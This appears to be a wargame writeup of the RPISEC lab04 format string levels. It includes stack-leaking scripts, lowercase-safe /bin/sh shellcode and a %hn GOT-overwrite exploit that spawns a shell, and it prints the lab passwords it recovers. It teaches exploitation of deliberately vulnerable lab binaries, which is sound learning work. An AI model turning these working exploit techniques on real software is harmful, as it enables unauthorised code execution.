In the last lab (the writeup can be found here), we exploited the provided binaries using publicly available shellcode as well as shellcode we had to write ourselves. This writeup continues with the next lab, which focuses on format strings.
As usual there are three levels ranging from C to A:
–> lab4C
–> lab4B
–> lab4A
lab4C
We start by connecting to the first level of lab04 using the credentials lab4C with the password lab04start:
gameadmin@warzone:~$ sudo ssh lab4C@localhost lab4C@localhost's password: (lab04start) ____________________.___ _____________________________ \______ \______ \ |/ _____/\_ _____/\_ ___ \ | _/| ___/ |\_____ \ | __)_ / \ \/ | | \| | | |/ \ | \\ \____ |____|_ /|____| |___/_______ //_______ / \______ / \/ \/ \/ \/ __ __ _____ ____________________________ _______ ___________ / \ / \/ _ \\______ \____ /\_____ \ \ \ \_ _____/ \ \/\/ / /_\ \| _/ / / / | \ / | \ | __)_ \ / | \ | \/ /_ / | \/ | \| \ \__/\ /\____|__ /____|_ /_______ \\_______ /\____|__ /_______ / \/ \/ \/ \/ \/ \/ \/ -------------------------------------------------------- Challenges are in /levels Passwords are in /home/lab*/.pass You can create files or work directories in /tmp -----------------[ contact@rpis.ec ]----------------- Last login: Sat Jan 27 06:07:38 2018 from localhost
Like in the last labs we have access to the source code of each level:
lab4C@warzone:/levels/lab04$ cat lab4C.c
/*
 *   Format String Lab - C Problem
 *   gcc -z execstack -z norelro -fno-stack-protector -o lab4C lab4C.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PASS_LEN 30

int main(int argc, char *argv[])
{
    char username[100] = {0};
    char real_pass[PASS_LEN] = {0};
    char in_pass[100] = {0};
    FILE *pass_file = NULL;
    int rsize = 0;

    /* open the password file */
    pass_file = fopen("/home/lab4B/.pass", "r");
    if (pass_file == NULL) {
        fprintf(stderr, "ERROR: failed to open password file\n");
        exit(EXIT_FAILURE);
    }

    /* read the contents of the password file */
    rsize = fread(real_pass, 1, PASS_LEN, pass_file);
    real_pass[strcspn(real_pass, "\n")] = '\0';  // strip \n
    if (rsize != PASS_LEN) {
        fprintf(stderr, "ERROR: failed to read password file\n");
        exit(EXIT_FAILURE);
    }

    /* close the password file */
    fclose(pass_file);

    puts("===== [ Secure Access System v1.0 ] =====");
    puts("-----------------------------------------");
    puts("- You must login to access this system. -");
    puts("-----------------------------------------");

    /* read username securely */
    printf("--[ Username: ");
    fgets(username, 100, stdin);
    username[strcspn(username, "\n")] = '\0';    // strip \n

    /* read input password securely */
    printf("--[ Password: ");
    fgets(in_pass, sizeof(in_pass), stdin);
    in_pass[strcspn(in_pass, "\n")] = '\0';      // strip \n

    puts("-----------------------------------------");

    /* log the user in if the password is correct */
    if(!strncmp(real_pass, in_pass, PASS_LEN)){
        printf("Greetings, %s!\n", username);
        system("/bin/sh");
    } else {
        printf(username);
        printf(" does not have access!\n");
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}
What does the program do?
–> The file /home/lab4B/.pass is opened (line 22).
–> Its contents are stored in a buffer called real_pass (line 29).
–> The user can input a username (lines 45-47) and a password (lines 50-52).
–> If the password matches the real password (line 57), a shell is spawned (line 59).
–> If the password does not match, printf is called with username as its only argument (line 61).
As the lab's subject suggests, we are looking for some kind of format string vulnerability. Many C functions (for example printf, fprintf and snprintf) use format strings. The number of arguments passed to those functions is variable:
char username[] = "admin";
int id = 1337;
printf("hello %s, your id is: %d\n", username, id);
In the example above, three arguments are passed to the function:
- The format string: "hello %s, your id is: %d\n"
- A string: username
- An integer: id
The function printf simply processes the format string looking for format specifiers. When a format specifier is found, it takes the first argument following the format string on the stack and inserts it into the output according to the chosen format specifier. When the next format specifier is found, the second argument from the stack is inserted:
lab4C@warzone:/tmp$ ./example
hello admin, your id is: 1337
If there were another format specifier within the format string, the function would simply take the next element on the stack, whether or not an argument was actually passed there.
When we can control the format string, we can insert format specifiers which will leak elements stored on the stack.
In the code above on line 61 printf is called with the first argument (the format string) being a string the user provided (username). Thus we can use the username to leak items on the stack:
lab4C@warzone:/levels/lab04$ ./lab4C
===== [ Secure Access System v1.0 ] =====
-----------------------------------------
- You must login to access this system. -
-----------------------------------------
--[ Username: test%d
--[ Password: test
-----------------------------------------
test-1073744446 does not have access!
lab4C@warzone:/levels/lab04$
After entering test%d, printf expects the next item on the stack to be an integer and inserts it into the string: test-1073744446.
As we already know, the password we are looking for is conveniently stored in a local variable on the stack (real_pass). Thus we only need to leak enough items from the stack to reach the password.
Very handy for this task is the argument selector $. With N$ the argument to be printed can be selected by its position on the stack:
#include <stdio.h>

int main() {
    char c1 = 'A';
    char c2 = 'B';
    char c3 = 'C';

    printf("%2$c %3$c %1$c\n", c1, c2, c3);

    return 0;
}
Running this example will print B, C, A instead of A, B, C:
lab4C@warzone:/levels/lab04$ ./example2
B C A
Because the local variable username is limited to 100 bytes, we cannot fit enough format specifiers into a single input. Instead we write a python-script which runs the program multiple times and leaks a different range of stack items on each run:
lab4C@warzone:/levels/lab04$ cat /tmp/exploit_lab4C.py
from pwn import *

for i in range(1, 40, 10):
    p = process("./lab4C")
    line = ""
    for j in range(10):
        line += "%"+str(i+j)+"$08x "
    p.sendline(line)
    p.sendline("pass")
    print(p.recv(2000))
The script runs the program 4 times, each time passing a format string (built in the inner loop and sent with the first sendline call) which prints 10 items from the stack. The format specifier %N$08x prints the N-th item on the stack as a hex value (x) padded with leading zeros to 8 characters (08):
lab4C@warzone:/levels/lab04$ python /tmp/exploit_lab4C.py [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- bffff5c2 0000001e 0804a008 61700000 00007373 00000000 00000000 00000000 00000000 00000000 does not have access! [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 does not have access! [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 75620000 74315f37 does not have access! [+] Starting program './lab4C': Done [*] Program './lab4C' stopped with exit code 1 ===== [ Secure Access System v1.0 ] ===== ----------------------------------------- - You must login to access this system. - ----------------------------------------- --[ Username: --[ Password: ----------------------------------------- 7334775f 625f376e 33745572 7230665f 62343363 00216531 24313325 20783830 24323325 20783830 does not have access!
We only need to extract the password from the local variable real_pass now. The output from the last two calls looks like ASCII:
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 75620000 74315f37 does not have access!
7334775f 625f376e 33745572 7230665f 62343363 00216531 24313325 20783830 24323325 20783830 does not have access!
In the second line there is a null-byte terminating the string. The following python-script contains the concatenated bytes and converts these bytes from little endian to the final string:
lab4C@warzone:/levels/lab04$ cat /tmp/convertPwd_lab4C.py
pwd_le = "7562000074315f377334775f625f376e337455727230665f6234336300216531"
pwd = ""

for i in range(0, len(pwd_le), 8):
    # the 4 byte values are stored in little endian
    pwd += pwd_le[i+6:i+8] + pwd_le[i+4:i+6] + pwd_le[i+2:i+4] + pwd_le[i:i+2]

print(pwd)
print(pwd.decode("hex"))
Running the script yields the password:
lab4C@warzone:/levels/lab04$ python /tmp/create_lab4C.py
00006275375f31745f7734736e375f62725574335f6630726333346231652100
bu7_1t_w4sn7_brUt3_f0rc34b1e!
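The conversion script above relies on Python 2's str.decode("hex"). As a minimal sketch, the same decoding can be done in Python 3 with the struct module. The list leaked_words and the helper words_to_bytes are names chosen for this illustration; the values are the eight words printed for arguments 29 to 36 in the output above.

```python
import struct

# Words exactly as printed by the %N$08x leak (arguments 29 to 36).
leaked_words = [
    "75620000", "74315f37", "7334775f", "625f376e",
    "33745572", "7230665f", "62343363", "00216531",
]

def words_to_bytes(words):
    """Re-pack each 32-bit value in little-endian order, as it lies in memory."""
    return b"".join(struct.pack("<I", int(word, 16)) for word in words)

raw = words_to_bytes(leaked_words)
# Strip the NUL bytes before and after the password.
password = raw.strip(b"\x00").decode("ascii")
print(password)
```

Packing each word with "<I" restores the byte order in memory, so no manual slicing of hex digits is needed.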
Done :) The password for the next level is: bu7_1t_w4sn7_brUt3_f0rc34b1e!
We could enter this password into the program in order to get a shell, but the password is all we need for now :)
lab4B
We connect to the next level using the previously gained credentials lab4B with the password bu7_1t_w4sn7_brUt3_f0rc34b1e!:
gameadmin@warzone:~$ sudo ssh lab4B@localhost lab4B@localhost's password: (bu7_1t_w4sn7_brUt3_f0rc34b1e!) ____________________.___ _____________________________ \______ \______ \ |/ _____/\_ _____/\_ ___ \ | _/| ___/ |\_____ \ | __)_ / \ \/ | | \| | | |/ \ | \\ \____ |____|_ /|____| |___/_______ //_______ / \______ / \/ \/ \/ \/ __ __ _____ ____________________________ _______ ___________ / \ / \/ _ \\______ \____ /\_____ \ \ \ \_ _____/ \ \/\/ / /_\ \| _/ / / / | \ / | \ | __)_ \ / | \ | \/ /_ / | \/ | \| \ \__/\ /\____|__ /____|_ /_______ \\_______ /\____|__ /_______ / \/ \/ \/ \/ \/ \/ \/ -------------------------------------------------------- Challenges are in /levels Passwords are in /home/lab*/.pass You can create files or work directories in /tmp -----------------[ contact@rpis.ec ]----------------- Last login: Sun Jan 21 15:08:34 2018 from localhost
And start analysing the provided source code:
lab4B@warzone:/levels/lab04$ cat lab4B.c
/*
 *   Format String Lab - B Problem
 *   gcc -z execstack -z norelro -fno-stack-protector -o lab4B lab4B.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    int i = 0;
    char buf[100];

    /* read user input securely */
    fgets(buf, 100, stdin);

    /* convert string to lowercase */
    for (i = 0; i < strlen(buf); i++)
        if (buf[i] >= 'A' && buf[i] <= 'Z')
            buf[i] = buf[i] ^ 0x20;

    /* print out our nice and new lowercase string */
    printf(buf);

    exit(EXIT_SUCCESS);
    return EXIT_FAILURE;
}
What does the program do?
–> On line 15 fgets is called, reading at most 99 characters (plus the terminating null byte) into a local variable called buf.
–> In the for-loop on lines 18-20 all upper-case characters are converted to lower-case.
–> The adjusted user input is printed using printf (line 23).
As in the last level, we control a string which is passed as a format string to printf. This time the string is converted to lower-case before being passed to printf, but that should not do too much harm. The main difference compared to the last level is that the password we are looking for is unfortunately not stored in a local variable on the stack. Thus we cannot just leak the password.
In order to exploit the program another handy feature of format strings comes into play: the format specifier %n. When placed in a format string, %n writes the number of characters printed so far to the variable whose address is passed as the corresponding argument:
#include <stdio.h>

int main() {
    int len = 0;  /* %n expects a pointer to int */

    printf("testing with%n n-specifier\n", &len);
    printf("bytes printed by last printf so far: %d\n", len);

    return 0;
}
Running the example:
lab4B@warzone:/tmp$ ./example
testing with n-specifier
bytes printed by last printf so far: 12
As we can see, the value 12 is written to the local variable len. 12 is the number of characters printed before the %n specifier: len("testing with") = 12.
This format specifier can be abused to write arbitrary data to an arbitrary address! We will get to this later.
At first we need to know where on the stack the buffer we can write to (buf) is located. This can be done by putting a pattern into the buffer, followed by a few format specifiers which leak the stack:
lab4B@warzone:/levels/lab04$ ./lab4B
aaaa.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
aaaa.00000064.b7fcdc20.00000000.bffff704.bffff678.61616161.3830252e.30252e78.252e7838
The input begins with aaaa, which equals 61616161 in hex. As we can see, the 6th item on the stack is the beginning of our buffer. We can verify this by using the argument selector:
lab4B@warzone:/levels/lab04$ ./lab4B
aaaa.%6$08x
aaaa.61616161
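Counting the leaked fields by hand is error-prone, so the search for the pattern can be automated. The following is a small sketch; find_pattern_argument is a hypothetical helper written for this writeup, and the input string is the output line of the first leak above.

```python
def find_pattern_argument(printf_output, pattern_hex="61616161", sep="."):
    """Return the 1-based printf argument index whose leaked value equals pattern_hex."""
    fields = printf_output.strip().split(sep)
    leaked = fields[1:]  # fields[0] is the literal "aaaa" prefix
    for index, value in enumerate(leaked, start=1):
        if value == pattern_hex:
            return index
    return None

output = ("aaaa.00000064.b7fcdc20.00000000.bffff704.bffff678."
          "61616161.3830252e.30252e78.252e7838")
print(find_pattern_argument(output))
```

The returned index is the number to use in front of the $ selector.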
Thus, when printf is entered, arguments 1 to 5 on the stack hold the five values leaked before our pattern, and the 6th argument is the first 4 bytes of buf.
As the stack is executable and we control a long enough buffer (100 bytes), we can store a shellcode in this buffer. In lab03 we executed our shellcode by overwriting the return address on the stack. Reconsider the last lines of the source code:
    exit(EXIT_SUCCESS);
    return EXIT_FAILURE;
}
Before the main function returns, exit is called. This terminates the program directly, and the return instruction is never reached. Thus our shellcode would not be executed if we overwrote the return address. We have to write the address of our shellcode somewhere else.
In this case we can use the function call to exit in order to redirect the control flow. We do not want to go into the details for now. All you need to know is that calls to library functions are made through the Procedure Linkage Table (PLT), which references the Global Offset Table (GOT):
[0x08048590]> pdf @ main
| (fcn) sym.main 276
|          ; DATA XREF from 0x080485a7 (entry0)
|          ;-- main:
|          ;-- sym.main:
|          0x0804868d    55             push ebp
|          0x0804868e    89e5           mov ebp, esp
...
|          0x08048729    c70424000000.  mov dword [esp], 0
|          0x08048730    e82bfeffff     call sym.imp.exit ;sym.imp.exit()
...
[0x080486a4]> pdf @ sym.imp.exit
| (fcn) sym.imp.exit 6
|          ; CALL XREF from 0x08048730 (sym.main)
|          ;-- sym.imp.exit:
|          0x08048560    ff25b8990408   jmp dword [reloc.exit_184] ; "f...v......." @ 0x80499b8
[0x080486a4]>
As we can see in the output above, exit is called through the symbol sym.imp.exit (0x08048560). This address is the exit entry within the PLT and contains a jump to the address stored at reloc.exit_184, which is the GOT entry of exit. This means that, when exit is called, the execution will proceed at the address stored at reloc.exit_184 (0x80499b8).
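The GOT address can also be read directly from the bytes of the PLT stub shown in the disassembly. The sketch below decodes the 6 bytes at 0x08048560, assuming they form an x86 indirect jump (opcode FF 25 followed by a 32-bit little-endian address); got_slot_from_plt_stub is a name made up for this example.

```python
import struct

def got_slot_from_plt_stub(stub):
    """Decode an x86 `jmp dword [imm32]` (opcode FF 25) and return imm32."""
    if stub[:2] != b"\xff\x25":
        raise ValueError("not an indirect jmp through an absolute address")
    (slot,) = struct.unpack("<I", stub[2:6])
    return slot

plt_exit = bytes.fromhex("ff25b8990408")  # bytes shown at 0x08048560
print(hex(got_slot_from_plt_stub(plt_exit)))
```

The decoded value is the address of the 4-byte slot that we want to overwrite.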
If we write the address of our shellcode to that address, our shellcode will be executed when the function exit is called.
Summing it up, we need to do the following:
–> Store a shellcode in the buffer.
–> Abuse the %n specifier to write the address of our shellcode to the GOT entry of exit.
shellcode
Basically we can reuse the shellcode from lab03, which makes a sys_execve syscall passing /bin/sh as argument.
One point we have to consider is that the string we enter is converted to lower-case before being passed to printf. Thus our shellcode cannot contain bytes between 0x41 (A) and 0x5A (Z). So we have to adjust the shellcode we used a little bit:
31 c0            xor eax, eax
;50              push eax
83 ec 04         sub esp, 0x4
89 04 24         mov [esp], eax
68 2f 2f 73 68   push 0x68732f2f
68 2f 62 69 6e   push 0x6e69622f
89 e3            mov ebx, esp
89 c1            mov ecx, eax
89 c2            mov edx, eax
b0 0b            mov al, 0xb
cd 80            int 0x80
31 c0            xor eax, eax
40               inc eax
cd 80            int 0x80
The instruction push eax (0x50, the ASCII code of P) would be converted to lower-case and thus be destroyed. As there are plenty of ways of doing things on x86, we can simply replace this instruction with two new instructions: sub esp, 0x4 and mov [esp], eax. For our purposes they do the same as push eax.
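Whether a shellcode survives the conversion can be checked before sending it. The sketch below mimics the loop from lab4B and lists the offsets of bytes it would change. The helper names are invented for this example, and the byte string original is an assumption: it is the listing above with push eax (0x50) in place of the two replacement instructions and without the trailing exit syscall.

```python
def lowercase_like_lab4b(data):
    """Mimic the loop in lab4B: XOR every byte in 'A'..'Z' with 0x20."""
    return bytes(b ^ 0x20 if 0x41 <= b <= 0x5A else b for b in data)

def mangled_offsets(data):
    """Offsets of bytes that the conversion would change."""
    return [i for i, b in enumerate(data) if 0x41 <= b <= 0x5A]

# Assumed original: same listing, but with push eax (0x50).
original = bytes.fromhex("31c050682f2f7368682f62696e89e389c189c2b00bcd80")
# Adjusted shellcode as used in the exploit (28 bytes).
adjusted = bytes.fromhex(
    "31c083ec04890424682f2f7368682f62696e89e389c189c2b00bcd80"
)

print(mangled_offsets(original))
print(mangled_offsets(adjusted))
print(lowercase_like_lab4b(adjusted) == adjusted)
```

An empty list for the adjusted shellcode means the conversion loop leaves it untouched.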
%n specifier
As I have already mentioned, the %n specifier can be used to write arbitrary data to an arbitrary address. We will now see how this works and use it to write the address of our shellcode to the GOT entry of exit.
In the example earlier in this writeup, we have seen that %n expects a pointer to an integer and writes the count of characters printed so far to this address. As we have also seen, we can use the argument selector $ to select a specific argument. If the string we enter contains the address we want to write to, we can simply select this address with the argument selector $ and write the count of characters printed so far with the %n specifier.
So for now we can write to an arbitrary address. But how do we control which value we write? Since the count of printed characters is written, we simply have to print as many characters as the value we want to write. This can be done easily by using the padding mechanism of format strings we already used: the format specifier %8x pads the value to 8 characters. If we use %1000x, the value is padded to 1000 characters.
We already determined the address we want to write to (the GOT entry of exit): 0x80499b8.
We still need the address of our shellcode (the address of buf on the stack):
lab4B@warzone:/levels/lab04$ gdb lab4B
Reading symbols from lab4B...(no debugging symbols found)...done.
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0804868d <+0>:     push ebp
   0x0804868e <+1>:     mov ebp,esp
   0x08048690 <+3>:     push ebx
   ...
   0x080486b0 <+35>:    lea eax,[esp+0x18]
   0x080486b4 <+39>:    mov DWORD PTR [esp],eax
   0x080486b7 <+42>:    call 0x8048540 <fgets@plt>
   ...
   0x08048729 <+156>:   mov DWORD PTR [esp],0x0
   0x08048730 <+163>:   call 0x8048560 <exit@plt>
End of assembler dump.
gdb-peda$ b *main+42
Breakpoint 1 at 0x80486b7
As the buffer buf is passed as an argument to fgets, we simply set a breakpoint before the call and inspect the stack when the breakpoint is hit:
gdb-peda$ r Starting program: /levels/lab04/lab4B [----------------------------------registers-----------------------------------] EAX: 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff EBX: 0xb7fcd000 --> 0x1a9da8 ECX: 0x859c4868 EDX: 0xbffff744 --> 0xb7fcd000 --> 0x1a9da8 ESI: 0x0 EDI: 0x0 EBP: 0xbffff718 --> 0x0 ESP: 0xbffff690 --> 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff EIP: 0x80486b7 (<main+42>: call 0x8048540 <fgets@plt>) EFLAGS: 0x287 (CARRY PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x80486a8 <main+27>: mov DWORD PTR [esp+0x4],0x64 0x80486b0 <main+35>: lea eax,[esp+0x18] 0x80486b4 <main+39>: mov DWORD PTR [esp],eax => 0x80486b7 <main+42>: call 0x8048540 <fgets@plt> 0x80486bc <main+47>: mov DWORD PTR [esp+0x7c],0x0 0x80486c4 <main+55>: jmp 0x8048709 <main+124> 0x80486c6 <main+57>: lea edx,[esp+0x18] 0x80486ca <main+61>: mov eax,DWORD PTR [esp+0x7c] Guessed arguments: arg[0]: 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff arg[1]: 0x64 ('d') arg[2]: 0xb7fcdc20 --> 0xfbad2088 [------------------------------------stack-------------------------------------] 0000| 0xbffff690 --> 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff 0004| 0xbffff694 --> 0x64 ('d') 0008| 0xbffff698 --> 0xb7fcdc20 --> 0xfbad2088 0012| 0xbffff69c --> 0x0 0016| 0xbffff6a0 --> 0xbffff754 --> 0xbde68c78 0020| 0xbffff6a4 --> 0xbffff6c8 --> 0xb7e2fbf8 --> 0x2aa0 0024| 0xbffff6a8 --> 0xbffff6c0 --> 0xffffffff 0028| 0xbffff6ac --> 0x80483a9 ("__libc_start_main") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x080486b7 in main () gdb-peda$
The address 0xbffff6a8 is on top of the stack. This will be the address where we store our shellcode. Nevertheless we must remember that this address may vary when running the binary directly without gdb.
Finally we can write a python-script which will create the input to the program:
lab4B@warzone:/levels/lab04$ cat /tmp/exploit_lab4B.py
import sys
from pwn import *

shellcode = ("\x31\xc0"
             "\x83\xec\x04"
             "\x89\x04\x24"
             "\x68\x2f\x2f\x73\x68"
             "\x68\x2f\x62\x69\x6e"
             "\x89\xe3"
             "\x89\xc1"
             "\x89\xc2"
             "\xb0\x0b"
             "\xcd\x80")  # len = 28

exit_got = 0x080499b8
addr_buf = int(sys.argv[1], 16)  # gdb: 0xbffff6a8

value_u2 = addr_buf >> 16
value_l2 = addr_buf & 0xffff

expl = shellcode
expl += p32(exit_got+2)  # upper bytes at higher address --> little endian!
expl += p32(exit_got)
expl += "%" + str(value_u2 - 28 - 8) + "x"
expl += "%13$hn"
expl += "%" + str(value_l2 - value_u2) + "x"
expl += "%14$hn"

sys.stdout.write(expl+"\n")
The following picture illustrates how printf evaluates the string provided by the python-script:
The first 28 bytes of the user input are the shellcode we adjusted to survive the lower-case conversion. The next 4 bytes are the address of the GOT entry of exit plus 2, followed by another 4 bytes which are the exact address of exit's GOT entry. This is done because we do not write all 4 bytes of our shellcode address at once, but 2 bytes at a time. This way we can limit the number of characters we need to print. The only difference between the format specifiers %hn and %n is that %hn expects a pointer to a short (2 bytes) instead of a pointer to an integer (4 bytes).
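One important aspect is that we need to write the lower of the two values first, because the count of printed characters can only grow: we can easily print more characters after the first write, but not fewer. For a stack address the upper half (0xbfff) is smaller than the lower half here, so it is written first.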
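The ordering rule and the argument selectors can be derived mechanically. The following sketch is not part of the exploit script; plan_hn_writes is a hypothetical helper. It assumes the payload layout used above: buf starts at argument 6, so after 28 bytes of shellcode the two embedded addresses are arguments 6 + 28/4 = 13 and 14.

```python
def plan_hn_writes(value, target, first_selector):
    """Split a 32-bit value into two 16-bit halves for two %hn writes.

    Returns (addresses, steps): the addresses in the order they are embedded
    in the payload, and (half_value, selector) pairs sorted so that the
    smaller half is written first.
    """
    high, low = value >> 16, value & 0xFFFF
    addresses = [target + 2, target]      # same layout as the script above
    steps = [(high, first_selector), (low, first_selector + 1)]
    steps.sort(key=lambda step: step[0])  # the printed-character count only grows
    return addresses, steps

first_selector = 6 + 28 // 4
addresses, steps = plan_hn_writes(0xbffff658, 0x080499b8, first_selector)
print([hex(a) for a in addresses], steps)
```

The script in this writeup hard-codes the order "upper half first", which works because 0xbfff is smaller than the lower half of the buffer address. For an address whose lower half is the smaller one, the two %hn writes would have to be swapped.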
Summing it up, printf will:
–> Print the first 36 static characters (our shellcode + the 2 addresses).
–> Print the first element on the stack padded to 49115 characters.
–> Write the number of characters printed so far (36+49115 = 49151 = 0xbfff) to address exit_got+2.
–> Print the second element on the stack padded to 13913 characters.
–> Write the number of characters printed so far (49151+13913 = 63064 = 0xf658) to address exit_got.
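The steps above can be replayed with a simple counter to double-check the arithmetic. This is only a model of printf's character counter, not a run of the real binary; simulate_hn is a name invented for this sketch, and it assumes every padded value prints exactly pad_width characters (true here, since a 32-bit hex value has at most 8 digits).

```python
def simulate_hn(static_len, steps):
    """Replay the character counter; steps is a list of (pad_width, address)."""
    printed = static_len
    writes = {}
    for pad_width, address in steps:
        printed += pad_width                # %<pad_width>x prints pad_width characters
        writes[address] = printed & 0xFFFF  # %hn stores the low 16 bits of the count
    return writes

exit_got = 0x080499b8
writes = simulate_hn(28 + 8, [(49115, exit_got + 2), (13913, exit_got)])
final = (writes[exit_got + 2] << 16) | writes[exit_got]
print(hex(final))
```

Combining the two halves gives the 32-bit value that ends up in the GOT entry of exit.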
As you may have noticed, I have already changed the address of our shellcode from 0xbffff6a8 to 0xbffff658, since the address determined using gdb differs slightly from the address when executing the binary directly. In order to quickly test a few addresses, I have made the shellcode address an argument to the python script.
Now we only need to create the final input to the program:
lab4B@warzone:/levels/lab04$ python /tmp/exploit_lab4B.py 0xbffff658 > /tmp/out
And run the binary with that input:
lab4B@warzone:/levels/lab04$ (cat /tmp/out; cat) | ./lab4B
1βββ$h//shh/binβββΒ° Νββ 64 b7fcdc20
whoami
lab4A
cat /home/lab4A/.pass
fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3
Done :) The password is fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3.
lab4A
We connect to the last level of lab04 using the credentials lab4A with the password fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3:
gameadmin@warzone:~$ sudo ssh lab4A@localhost lab4A@localhost's password: (fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3) ____________________.___ _____________________________ \______ \______ \ |/ _____/\_ _____/\_ ___ \ | _/| ___/ |\_____ \ | __)_ / \ \/ | | \| | | |/ \ | \\ \____ |____|_ /|____| |___/_______ //_______ / \______ / \/ \/ \/ \/ __ __ _____ ____________________________ _______ ___________ / \ / \/ _ \\______ \____ /\_____ \ \ \ \_ _____/ \ \/\/ / /_\ \| _/ / / / | \ / | \ | __)_ \ / | \ | \/ /_ / | \/ | \| \ \__/\ /\____|__ /____|_ /_______ \\_______ /\____|__ /_______ / \/ \/ \/ \/ \/ \/ \/ -------------------------------------------------------- Challenges are in /levels Passwords are in /home/lab*/.pass You can create files or work directories in /tmp -----------------[ contact@rpis.ec ]----------------- Last login: Mon Jan 22 03:50:48 2018 from localhost
As always we start by analysing the source code:
lab4A@warzone:/levels/lab04$ cat lab4A.c
/*
 *   Format String Lab - A Problem
 *   gcc -z execstack -z relro -z now -o lab4A lab4A.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

#define BACKUP_DIR "./backups/"
#define LOG_FILE "./backups/.log"

void log_wrapper(FILE *logf, char *msg, char *filename)
{
    char log_buf[255];
    strcpy(log_buf, msg);
    snprintf(log_buf+strlen(log_buf), 255-strlen(log_buf)-1/*NULL*/, filename);
    log_buf[strcspn(log_buf, "\n")] = '\0';
    fprintf(logf, "LOG: %s\n", log_buf);
}

int main(int argc, char *argv[])
{
    char ch = EOF;
    char dest_buf[100];
    FILE *source, *logf;
    int target = -1;


    if (argc != 2) {
        printf("Usage: %s filename\n", argv[0]);
    }

    // Open log file
    logf = fopen(LOG_FILE, "w");
    if (logf == NULL) {
        printf("ERROR: Failed to open %s\n", LOG_FILE);
        exit(EXIT_FAILURE);
    }

    log_wrapper(logf, "Starting back up: ", argv[1]);

    // Open source
    source = fopen(argv[1], "r");
    if (source == NULL) {
        printf("ERROR: Failed to open %s\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    // Open dest
    strcpy(dest_buf, BACKUP_DIR);
    strncat(dest_buf, argv[1], 100-strlen(dest_buf)-1/*NULL*/);
    target = open(dest_buf, O_CREAT | O_EXCL | O_WRONLY, S_IRUSR | S_IWUSR);
    if (target < 0) {
        printf("ERROR: Failed to open %s%s\n", BACKUP_DIR, argv[1]);
        exit(EXIT_FAILURE);
    }

    // Copy data
    while( ( ch = fgetc(source) ) != EOF)
        write(target, &ch, 1);

    log_wrapper(logf, "Finished back up ", argv[1]);

    // Clean up
    fclose(source);
    close(target);

    return EXIT_SUCCESS;
}
What does the program do?
–> The program is supposed to be run with one argument (lines 34-35).
–> A logfile is opened, which is passed to the function log_wrapper (lines 39, 45).
–> The argument passed to the program is interpreted as a filename (line 48).
–> The given file is copied byte-by-byte to the folder ./backups/ (lines 64-65).
–> The function log_wrapper copies the given message (msg) into a temporary buffer (log_buf) (line 20).
–> The filename, taken from the argument passed to the program, is appended to that buffer using snprintf (line 21).
–> The temporary buffer (log_buf) is written to the logfile (line 23).
Where is the vulnerability within the program?
Since the source code is a little bit larger, it is not as obvious as in the last level. Yet again we are dealing with a format string vulnerability. This time it is not about printf but snprintf. On line 21 snprintf is called with the third argument being the format string. This is the filename the user provided when running the program. That means that the format string is user controlled and we can use the exploitation techniques described in the last two levels.
One may think that snprintf is more secure than printf since there is a size parameter (second argument), but this only sets the maximum number of characters written into the provided buffer (first argument). One may also think that this prevents the %n technique since we can only write a limited number of characters. But that is not true. Indeed we cannot write more bytes to the provided buffer, but the %n specifier does not store the number of bytes actually written; it stores the number of characters that would have been written without the limit! Despite the length limit of the buffer, we can still use the %n specifier to write arbitrary data to an arbitrary address.
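The difference between what is stored and what is counted can be pictured with a tiny model. This is not a call into libc; model_snprintf is a made-up function that only reproduces the bookkeeping described above for a format string that has already been expanded.

```python
def model_snprintf(size, expanded):
    """Model of snprintf's bookkeeping for an already expanded format string.

    Returns (stored, would_be_length): what fits into a buffer of `size` bytes
    (leaving room for the terminating NUL), and the untruncated length, which
    is the count a trailing %n would store according to the text above.
    """
    stored = expanded[: max(size - 1, 0)]
    return stored, len(expanded)

stored, count = model_snprintf(16, "A" * 1000)
print(len(stored), count)
```

Only 15 characters land in the buffer, yet the counter still reaches 1000, which is why large padding widths remain usable for %n writes.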
In the last level we overwrote an entry in the Global Offset Table (GOT) in order to redirect the control flow. This time we cannot do that, because the binary is compiled with Full RELRO:
lab4A@warzone:/levels/lab04$ checksec lab4A
RELRO       STACK CANARY  NX           PIE     RPATH     RUNPATH     FORTIFY  FORTIFIED  FORTIFY-able  FILE
Full RELRO  Canary found  NX disabled  No PIE  No RPATH  No RUNPATH  Yes      0          10            lab4A
